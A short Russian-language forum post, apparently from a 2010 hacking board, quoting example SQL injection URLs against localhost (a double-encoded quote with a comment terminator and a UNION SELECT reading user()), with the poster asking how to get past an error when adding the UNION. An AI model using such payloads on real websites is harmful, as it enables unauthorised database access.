Показать сообщение отдельно

  #10  
Старый 21.01.2010, 21:08
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от [NiGHT]DarkAngel  
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

Это к примеру,т.к точного уязвимого скрипта нет.
вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти
 
Ответить с цитированием